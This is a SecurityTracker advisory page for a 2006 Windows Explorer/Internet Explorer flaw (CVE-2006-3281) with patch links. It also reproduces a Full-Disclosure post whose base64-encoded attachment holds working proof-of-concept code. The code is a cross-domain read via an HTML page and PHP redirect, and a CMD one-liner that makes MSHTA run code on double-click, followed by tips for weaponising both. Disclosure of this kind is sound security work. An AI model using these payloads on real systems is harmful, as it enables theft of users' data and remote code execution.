SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   OS (Microsoft)  >   Windows Explorer Vendors:   Microsoft
Microsoft Windows Explorer Lets Remote Users Access Information in Other Domains and Execute HTA Applications
SecurityTracker Alert ID:  1016388
SecurityTracker URL:  http://securitytracker.com/id/1016388
CVE Reference:   CVE-2006-3281   (Links to External Site)
Updated:  Aug 8 2006
Original Entry Date:  Jun 27 2006
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2000 SP4, XP SP2, 2003 SP1; and prior service packs
Description:   A vulnerability was reported in Microsoft Windows Explorer. A remote user can obtain information from the target user's system. A remote user may be able to cause arbitrary code to be executed on the target user's system.

A remote user can create specially crafted HTML that, when loaded by the target user, can access content from a different domain. The object.documentElement.outerHTML property does not properly process HTTP Location redirects.

A remote user can create HTML that, when loaded by the target user, will cause an arbitrary HTA application to be executed on the target user's system. Some user interaction may be required.

Plebo Aesdi Nael reported this vulnerability.

[Editor's note: Microsoft indicates that the vulnerability is a Windows vulnerability that can be attacked via Internet Explorer.]

Impact:   A remote user can obtain information from an arbitrary domain.

A remote user can cause an arbitrary HTA application to be executed on the target user's system.

Solution:   The vendor has issued the following fixes:

Microsoft Windows 2000 Service Pack 4:

http://www.microsoft.com/downloads/details.aspx?FamilyId=38cee83e-b17a-4c08-90ce-fb836b9615ad

Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?FamilyId=6ef68858-4c91-47fb-ae34-0be556f10ede

Microsoft Windows XP Professional x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=50935f4e-e383-493e-97c6-599cbb2b87cc

Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1:

http://www.microsoft.com/downloads/details.aspx?FamilyId=759435a3-98f9-4115-b52e-d7fa9d024f16

Microsoft Windows Server 2003 for Itanium:

http://www.microsoft.com/downloads/details.aspx?FamilyId=462131c6-a728-4b3c-94de-85deccc42c3e

Microsoft Windows Server 2003 x64 Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=50eef5c5-861d-4802-85a2-6b0627aafc2a

A restart is required.

The Microsoft advisory is available at:

http://www.microsoft.com/technet/security/bulletin/ms06-045.mspx

Vendor URL:  www.microsoft.com/technet/security/bulletin/ms06-045.mspx (Links to External Site)
Cause:   Access control error

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] IE_ONE_MINOR_ONE_MAJOR

--========GMX290581151399975645732
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

text attached
-- 


Der GMX SmartSurfer hilft bis zu 70% Ihrer Onlinekosten zu sparen!

--========GMX290581151399975645732
Content-Type: application/octet-stream;
	name="PLEBO-2006.06.16-IE_ONE_MINOR_ONE_MAJOR.asc"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="PLEBO-2006.06.16-IE_ONE_MINOR_ONE_MAJOR.asc"

UkVQT1JUIE5BTUU6IFBMRUJPLTIwMDYuMDYuMTYtSUVfT05FX01JTk9SX09ORV9NQUpPUg0KREVT
VElOQVRJT046IFRvIFB1Ymxpc2gNCkVNQUlMIFJFQ1BUOiBidWd0cmFxDQoNCkNPTlRFTlRTDQp+
fn5+fn5+fg0KMC4gSU1QT1JUQU5UIE5PVElDRQ0KMS4gU1VNTUFSWQ0KMi4gUkVBRCBDT05URU5U
IE9GIEFOWSBET01BSU4gLSBQUk9PRiBPRiBDT05DRVBUDQozLiBSRUFEIENPTlRFTlQgT0YgQU5Z
IERPTUFJTiAtIFRJUFMgRk9SIE1BVFVSRSBFWFBMT0lUDQo0LiBET1VCTEUtQ0xJQ0sgQU5ZV0hF
UkUgT04gV0VCIFBBR0UgQ09VTEQgQUxMT1cgUkVNT1RFIENPREUgRVhFQ1VUSU9OIC0gUFJPT0Yg
T0YgQ09OQ0VQVA0KNS4gRE9VQkxFLUNMSUNLIEFOWVdIRVJFIE9OIFdFQiBQQUdFIENPVUxEIEFM
TE9XIFJFTU9URSBDT0RFIEVYRUNVVElPTiAtIFRJUFMgRk9SIE1BVFVSRSBFWFBMT0lUDQoNCjAu
IElNUE9SVEFOVCBOT1RJQ0UNCn5+fn5+fn5+fn5+fn5+fn5+fn4NCkNvcHlyaWdodCAoYykgMjAw
NiBQbGVibyBBZXNkaSBOYWVsDQpQZXJtaXNzaW9uIGlzIGhlcmVieSBncmFudGVkIGZvciB0aGUg
cmVkaXN0cmlidXRpb24gb2YgdGhpcyBkb2N1bWVudCBlbGVjdHJvbmljYWxseS4NCkl0IGlzIG5v
dCB0byBiZSBlZGl0ZWQgaW4gYW55IHdheSB3aXRob3V0IGV4cHJlc3MgY29uc2VudCBvZiBQbGVi
byBBZXNkaSBOYWVsLg0KUGxlYXNlIGVtYWlsIHBsZWJvQGdteC5uZXQgZm9yIHBlcm1pc3Npb24g
aWYgeW91IHdpc2ggdG8gcmVwcmludCB0aGUgd2hvbGUgb3IgYW55IHBhcnQgb2YgdGhpcyBkb2N1
bWVudCBpbiBhbnkgb3RoZXIgbWVkaXVtIGV4Y2x1ZGluZyBlbGVjdHJvbmljIG1lZGl1bS4NCg0K
UGxlYm8gQWVzZGkgTmFlbCwgcGxlYm9AZ214Lm5ldA0KDQotLS0tLUJFR0lOIFBHUCBQVUJMSUMg
S0VZIEJMT0NLLS0tLS0NClZlcnNpb246IEdudVBHIHYxLjQuMCAoRnJlZUJTRCkNCg0KbVFHaUJF
TEZSMzRSQkFEMFpoUGsyVzZOa0hiWk9iTFg0YjIwZlFBNUExSGN4Vlg3bmt0eFhuMUNOUE5aR3ds
bg0KNTJKZTcrbkN2TUMwa0xsRlBjMk11NTJhTDVHK1dNTmJQWW5rWENzTnhGQWlzY1JZYUljTWJ3
NFB2QjlDVzIxeg0KWkRYN0FxK1JnQ3JnUVhPRjZGdW1YVWdTR2dva1ZFTDB3R0I2RldnRGxFL3Qz
YXBtYWlOQStFdDVZd0NncWNmNw0KeTFUVE9palc5MVkxR2tnaEhZUW9uN0VELzNTWHNPOGVzRU9h
eDVjWEVuS2tHZnl1V1ZWenhjT0tTZGRGaDZ4Qg0KT0tMVGF6b0VZM09wSHFPNlMrMnEyd3lsQkZW
WnFkTTQxTnFUVlJDNXdRVmxRRVVvK2I0cURvRmZwN2NXUlVpeA0KbTgrWmJSUk42eThjYXpEQ2pu
U2pYSTNHR3dkM3AwME1oSlVLZXZKSXVSczZ2dnJFYXIyeFdjWGh1Qy9UWlhQSg0KYmdBZUJBRHNE
TTNUc1NnRTQ1OGdGTHJUSWF5Q1R0akpwNk9LTlQ0Qm1LWmFyQ09mZmxucWxjaE9MWThQQnNWSA0K
ZmxBNWp5QThzUEZzSW9lSUZrdXQ3RVl4MCs4RjJ5bStvV1NoYjdDVkJFWUl0c2g1VW10VTJ4Tldt
WW9KT3gvVQ0KYkIzUG5KS2RPM3ZDeGtOc2VJdThMcUhYRTFxemtkNDNvY3h4N2NQZ2RSRXlxdVpB
YzdRZ1VHeGxZbThnUVdWeg0KWkdrZ1RtRmxiQ0E4Y0d4bFltOUFaMjE0TG01bGRENklYUVFURVFJ
QUhnVUNRc1ZIZmdJYkF3WUxDUWdIQXdJRA0KRlFJREF4WUNBUUllQVFJWGdBQUtDUkN0WEVaMjBq
Q0hRU0hVQUppVkF1cVU1NWh6ZjFyU2dWMmJOeUJpNzFzUg0KQUp3TWYxb3JrRDB3SGQvalprblZB
ZGtPOUdIRnY3a0NEUVJDeFVlY0VBZ0F0ckljMTVpL2cxVzdzNElhSWhuNw0KWjBrMVYxaERqdnJL
UWlJS2I1Uno1Y2E3NjU5SU5xNC93cHUrcGkxdXNxZDNaYjUzL2V2MmZjZFlLeldZV2QwRw0KZGJ3
U0pyOHJkS1NNcjR5R3pYb0FWQ1d4akFIOTFUVWVGVlJ0elFKSUxsSTJDM2xtNTlzUVAxWVJkTUZD
KzlMZQ0KeTlYY3g5YVNtZXpoNy8veFVDeklVSmN4ZW5tcVhBMlIrMTQ3YUFsUUQxQldLZW1DV0V0
TVZjOVVlaCtEY2xMRw0KdEdpU0RGQkhNSWRVVDRtQjBwRnVrV0d3dE9YTm5YYjhEZll5amZvR1Fv
ZXRjR1JpV2t0UVBCQnlMTlRvU0xuRg0KSDhDdVQrek1RcHZSNkpYR0tsdHRTaFJFMGszUUFJbFlm
a3R3MGxveXpxRnhnbEZqZFFtSSsvalVnMHg1L25wVw0KMXdBREJRZjhDa0FkRjJaQm16anZXcndm
WTdEU3lhOGxueFUxSk5oWGVlbCtVN3huTHQxekNBeVVkaVlTL2ptQw0KUENDMFJPYVVsMHVxd25H
eWJpOFV6UHp1WDJLS2hmYXpOYzFtenFKb29yekR6RUJKNXlNamY0WWZiVmRUS2Q1dw0KaU9hNURV
bkRzRXg4TDFtclhoYlJLUStUL2R2Yi9MT3pmeEJKcnZKb2ZGQkFKVVMvV0V1aVdOWFBIVkdRMlZu
Vw0KRThqT0NmNUxhTUpYUThrSFpPYnVNaURhemd1YmNnN01LS0N0RFNGeXhNUUw5THZ6a2RVcTZh
QTYwSTFBS1Z2Kw0KekxvdFViY2ZremE1bUl5U0wvUVFHRWQyTjZoU0Nxbzg5MWtOYXMzYlV0NkU4
QldsYUxJdXhTUEFHZS9HeHp1Wg0KempoM2VPbS9ic1hLY0pJeWQ4VnVNanV6VnhDY3Q0aEpCQmdS
QWdBSkJRSkN4VWVjQWhzTUFBb0pFSzFjUm5iUw0KTUlkQmFOb0FvSWhNbk5PcXcyd1dKNFI3VjFx
alVDQ1FPVFAvQUo5SnU5N2pUTzhwTDR5MDh3clVwWis5VitFaw0KMGc9PQ0KPU9WMkUNCi0tLS0t
RU5EIFBHUCBQVUJMSUMgS0VZIEJMT0NLLS0tLS0NCg0KMS4gU1VNTUFSWQ0Kfn5+fn5+fn5+fg0K
VGhpcyBkb2N1bWVudCBpbGx1c3RyYXRlcyB0d28gaXNzdWVzIGZvdW5kIGluIEludGVybmV0IEV4
cGxvcmVyOg0KT25lIGlzIFJFQUQgQ09OVEVOVCBPRiBBTlkgRE9NQUlODQpBbm90aGVyIGlzIERP
VUJMRS1DTElDSyBBTllXSEVSRSBPTiBXRUIgUEFHRSBDT1VMRCBBTExPVyBSRU1PVEUgQ09ERSBF
WEVDVVRJT04NCg0KMi4gUkVBRCBDT05URU5UIE9GIEFOWSBET01BSU4gLSBQUk9PRiBPRiBDT05D
RVBUDQp+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn4NClRo
ZSBmb2xsb3dpbmcgcHJvb2Ygb2YgY29uY2VwdCBpcyBpbmNvbXBsZXRlIHJlYWxpemF0aW9uIG9m
IHRoZSBpZGVhIHRvIGRlbW9uc3RyYXRlIGl0cyBmZWFzaWJpbGl0eS4NCldpbmRvd3MgU2VydmVy
IDIwMDMsIEVudGVycHJpc2UgRWRpdGlvbiwgU2VydmljZSBQYWNrIDEsIDE1LzA2LzIwMDYNCg0K
VXBsb2FkIHRoZSBmb2xsb3dpbmcgZmlsZXMgdG8gV2ViIHNlcnZlciwgZ28gdG8gaS5odG1sDQot
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIGkuaHRtbCAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
DQo8aHRtbD48Ym9keSBvbmxvYWQ9InNldFRpbWVvdXQoJ2FsZXJ0KG8ub2JqZWN0LmRvY3VtZW50
RWxlbWVudC5vdXRlckhUTUwpJywxMDAwKSI+DQo8b2JqZWN0IHdpZHRoPTEwMCBoZWlnaHQ9MTAw
IGRhdGE9ci5waHA/aHR0cDovL3d3dy5nb29nbGUuY29tLzEyMzQ1Njc4OSB0eXBlPXRleHQvaHRt
bCBpZD1vPjwvb2JqZWN0Pg0KPC9ib2R5PjwvaHRtbD4NCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0gci5waHAgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPD9waHAgaGVhZGVyKCJMb2NhdGlv
bjogIi4kX1NFUlZFUlsiUVVFUllfU1RSSU5HIl0pOyA/Pg0KDQppLmh0bWwgZGlzcGxheXMgY29u
dGVudCBvZiBHb29nbGUgV2ViIHBhZ2UuDQoNCjMuIFJFQUQgQ09OVEVOVCBPRiBBTlkgRE9NQUlO
IC0gVElQUyBGT1IgTUFUVVJFIEVYUExPSVQNCn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+
fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn4NCjEuIFRhcmdldCBHb29nbGUgRGVza3RvcCwgc2lt
aWxhciB0byBJRSBEZXNpZ24gRmxhdyBMZXRzIEhhY2tlciBDcmFjayBHb29nbGUgRGVza3RvcCwg
aHR0cDovL3d3dy5ld2Vlay5jb20vYXJ0aWNsZTIvMCwxODk1LDE4OTU1NzksMDAuYXNwDQoyLiBU
YXJnZXQgd2VibWFpbA0KDQo0LiBET1VCTEUtQ0xJQ0sgQU5ZV0hFUkUgT04gV0VCIFBBR0UgQ09V
TEQgQUxMT1cgUkVNT1RFIENPREUgRVhFQ1VUSU9OIC0gUFJPT0YgT0YgQ09OQ0VQVA0Kfn5+fn5+
fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+
fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn4NClRoZSBmb2xsb3dpbmcgcHJvb2Ygb2YgY29uY2Vw
dCBpcyBpbmNvbXBsZXRlIHJlYWxpemF0aW9uIG9mIHRoZSBpZGVhIHRvIGRlbW9uc3RyYXRlIGl0
cyBmZWFzaWJpbGl0eS4NCldpbmRvd3MgU2VydmVyIDIwMDMsIEVudGVycHJpc2UgRWRpdGlvbiwg
U2VydmljZSBQYWNrIDEsIDE1LzA2LzIwMDYNCg0KQXNzdW1lIEM6XFNtYlB1YlJPIGlzIHNoYXJl
ZCBvdmVyIFNNQiBcXDE5Mi4xNjguMC41XFNtYlB1YlJPDQpSdW4gQ01ELCBnbyB0byBDOlxTbWJQ
dWJSTywgYW5kIHRoZW4gZW50ZXIgdGhlIGZvbGxvd2luZyBjb21tYW5kOg0KICAgIG1rZGlyIHRl
c3QgJiYgY2QgdGVzdCAmJiBta2RpciAlMmUlMmUlNWN4LnszMDUwZjRkOC05OEI1LTExQ0YtQkI4
Mi0wMEFBMDBCRENFMEJ9ICYmIGVjaG8gIjxodG1sPjxib2R5PjxpZnJhbWUgd2lkdGg9MzAwIGhl
aWdodD0zMDAgc3JjPScuLycgPjwvaWZyYW1lPiIgPiB0ZXN0Lmh0bWwgJiYgY2QgLi4gJiYgZWNo
byAiPGh0bWw+PGJvZHk+PHNjcmlwdD5hbGVydCgnaGFsbG8nKTwvc2NyaXB0PiIgPiB4LnszMDUw
ZjRkOC05OEI1LTExQ0YtQkI4Mi0wMEFBMDBCRENFMEJ9DQpBdCBsYXN0LCBvcGVuIElFIHRvIFxc
MTkyLjE2OC4wLjVcU21iUHViUk9cdGVzdFx0ZXN0Lmh0bWwsIGFuZCBkb3VibGUtY2xpY2sgdGhl
IGljb24gbGFiZWxlZCAlMmUlMmUlNWN4DQoNCk1TSFRBIHJ1bnMgcmVtb3RlIGNvZGUuDQoNCjUu
IERPVUJMRS1DTElDSyBBTllXSEVSRSBPTiBXRUIgUEFHRSBDT1VMRCBBTExPVyBSRU1PVEUgQ09E
RSBFWEVDVVRJT04gLSBUSVBTIEZPUiBNQVRVUkUgRVhQTE9JVA0Kfn5+fn5+fn5+fn5+fn5+fn5+
fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+
fn5+fn5+fn5+fn5+fn5+fn5+fn5+DQoxLiBVc2UgV2ViREFWLCBub3QgU01CDQoyLiBIaWRlIHN1
c3BpY2lvdXMgcGFydHMgYnkgQ1NTIHRyaWNrcyBzaW1pbGFyIHRvIFdoYXQgQSBEcmFnISAtcmV2
aXNpdGVkLSwgaHR0cDovL3d3dy5taWt4LmRlL2luZGV4LnBocD9wPTENCjMuIFNldCB1cCBzY2Vu
YXJpbyBvZiBkb3VibGUtY2xpY2sNCjQuIElmIG1vZGlmaWVkLCBhYmxlIHRvIGNvbXByb21pc2Ug
SUU3QkVUQTINCjUuIElmIG1vZGlmaWVkLCBubyBuZWVkIHRvIGRvdWJsZS1jbGljaw0KDQoNCg==
--========GMX290581151399975645732
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--========GMX290581151399975645732--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC